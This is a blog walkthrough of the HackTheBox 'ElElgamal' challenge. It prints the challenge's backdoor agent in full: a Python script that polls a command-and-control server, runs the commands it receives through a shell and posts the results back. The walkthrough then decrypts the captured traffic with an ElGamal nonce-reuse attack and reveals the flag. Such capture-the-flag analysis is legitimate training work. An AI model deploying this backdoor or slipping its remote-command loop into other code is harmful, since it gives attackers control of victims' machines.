HackTheBox: ElElgamal

After some minor warnings from IDS, you decide to check the logs to see if anything suspicious is happening. Surprised by what you see, you realise that one of your honeypots has been compromised with a cryptominer. As you look at the processes, you discover a backdoor attached to one of them. The backdoor retrieves the private key from the /key route of a C2. It establishes a session by sending an encrypted initilazation sequence. After the session is established, it waits for commands. The commands are encrypted and executed by the source code you found. Unfortunately, the IDS could not detect the request to /key and the machine was rebooted after the compromise, so the key cannot be found on the stack. Can you find out if any data was exfiltrated from the honeypot to mitigate future attacks?

Information

Challenge: ElElgamal

Category:
Crypto

Difficulty:
Easy

Files: ElElGamal.zip 13 Kb
encryption.py 1 KB
agent.py 2 KB
traffic.pcapng 217 KB

Environment: Remnux VM

 

My Recommendations

Download it from hackthebox and verify it with:

sha256sum /path/to/ElElGamal.zip

SHA256SUM: 

468415723baf153dec8f6b8bca34b5f96fbbe8a1ffcff301b4a11ef4d5fcbaa2 c3ccf87e19035eedbcf2

 

Walkthrough

1. Code Analysis

agent.py

				
					from encryption import ElGamal
from base64 import b64decode, b64encode
from Crypto.Util.number import long_to_bytes, bytes_to_long
from time import sleep
import requests
import subprocess
import json

IP = "192.168.1.6"
PORT = "5000"
HOST = f"http://{IP}:{PORT}"

el = ElGamal()


def getKey():
    data = requests.get(HOST + "/key").json()
    print("Fetched the key!")
    key = data["key"]
    key = b64decode(key)
    key = bytes_to_long(key)
    return key


def establishedSession():
    response = requests.get(HOST + "/tasks")
    if response.status_code == 200:
        encrypted_task = response.text
        task = decryptTask(encrypted_task)
        if task == "Session established":
            return True
    return False


def decryptTask(encrypted_task):
    task = el.decrypt(encrypted_task)
    task = task.decode().strip()
    return task


def encryptResult(result):
    task = el.encrypt(result)
    task = task.decode().strip()
    return task


def sendResult(result):
    result = {"result": result}
    requests.post(HOST + "/results", result)


def main():
    key = getKey()
    sleep(10)
    el.y = key

    if establishedSession():
        while True:
            sleep(3)

            response = requests.get(HOST + "/tasks")

            if response.status_code == 200:
                encrypted_task = response.text
                task = decryptTask(encrypted_task)
                try:
                    result = subprocess.check_output(task, shell=True)
                    result = result.decode()
                    if result != "":
                        result = "VALID " + result[:50]
                        result = bytes_to_long(result.encode())
                        result = el.encrypt(result)
                    sendResult(result)
                except:
                    sendResult("Error")


if __name__ == "__main__":
    main()

				
			

encryption.py

				
					from Crypto.Util.number import bytes_to_long, long_to_bytes, inverse
from base64 import b64encode, b64decode
import random


class ElGamal:
    def __init__(self):
        self.g = 10
        self.q = 855098176053225973412431085960229957742579395452812393691307482513933863589834014555492084425723928938458815455293344705952604659276623264708067070331
        self.h = 503261725767163645816647683654078455498654844869971762391249577031304598398963627308520614235127555024152461204399730504489081405546606977229017057765
        self.s = None
        self.y = random.randint(2, self.q)

    # This was used for self.h generation
    def generateKey(self) -> int:
        x = random.randint(2, self.q)
        return pow(self.g, x, self.q)

    def encrypt(self, m: int) -> str:
        s = pow(self.h, self.y, self.q)
        c1 = pow(self.g, self.y, self.q)
        c2 = (s * m) % self.q
        c1 = b64encode(long_to_bytes(c1)).decode()
        c2 = b64encode(long_to_bytes(c2)).decode()
        return c1 + "|" + c2

    def decrypt(self, ct: str) -> str:
        c1, c2 = ct.split("|")
        c1 = bytes_to_long(b64decode(c1))
        c2 = bytes_to_long(b64decode(c2))
        s = pow(c1, self.y, self.q)
        s = pow(self.h, self.y, self.q)
        m = (c2 * inverse(s, self.q)) % self.q
        return long_to_bytes(m)

				
			

The main function first retrieves a key, which is not in the recorded pcap. Then, it checks for the establishedSession() function. This function decrypts the first task, and verifies it is equal to  “Session established”. Afterwards, it reads the encrypted tasks, which in the pcap, are HTTP Responses with code 200 (aka OK).

The ElGamal algorithm used is insecure, because it uses the same nonce all the time. Since we also know one of the plaintext (The first response must be “Session Established), then we can do a nonce reuse attack on the rest of the data.

2. Pcap Parsing

First, we parse the pcap and clean up the data:

				
					from scapy.all import *

def parse_pcap(pcap_path, portnumber):
	pcap_flow = rdpcap(pcap_path)
	sessions = pcap_flow.sessions()
	payloads = []
	for session in sessions:
	 for packet in sessions[session]:
	  if TCP in packet and packet[TCP].sport == portnumber:
	  	if packet.haslayer('Raw') and len(packet.load) > 5:
	  		if b'HTTP/1.1' not in packet.load:
	  		 payloads.append(packet.getlayer('Raw').load)
	return payloads

def clean_tasks(encrypted_tasks):
	clean_tasks = []
	for task in encrypted_tasks:
		task = task.split(b'|')
		clean_tasks.append({'c1': bytes_to_long(base64.b64decode(task[0])), 'c2': bytes_to_long(base64.b64decode(task[1]))})
	return clean_tasks

encrypted_tasks = parse_pcap('traffic.pcapng', 5000)
cleaned = clean_tasks(encrypted_tasks)
				
			

Next, we can proceed to the Nonce Reuse Attack.

3. Nonce Reuse Attack

The code for the attack is from here.

				
					from Crypto.Util.number import long_to_bytes, bytes_to_long
import base64 

h = 503261725767163645816647683654078455498654844869971762391249577031304598398963627308520614235127555024152461204399730504489081405546606977229017057765
q = 855098176053225973412431085960229957742579395452812393691307482513933863589834014555492084425723928938458815455293344705952604659276623264708067070331
g = 10 

def nonce_reuse_attack(item, known_pt, known_ct):
	calc =  int(pow(known_ct, -1, q) * item * known_pt % q)
	item = long_to_bytes(calc)
	return item 

known_ct = cleaned[0]['c2']
known_pt = bytes_to_long(b"Session established")
decrypted_full = [nonce_reuse_attack(i['c2'], known_pt, known_ct) for i in cleaned[1:]]

print(b'\n'.join(decrypted_full).decode())
#[...]
#echo -n '-u "HTB{n3ve2_u53_' >> /opt/f.sh
#echo -n '7h3_54m3_k3y:)}" ' >> /opt/f.sh
#[..]
				
			

Flag: HTB{n3ve2_u53_7h3_54m3_k3y:)}

Recent Posts

Follow Us

Featured Video

Guide

Discover more from forensicskween

Subscribe now to keep reading and get access to the full archive.

Continue reading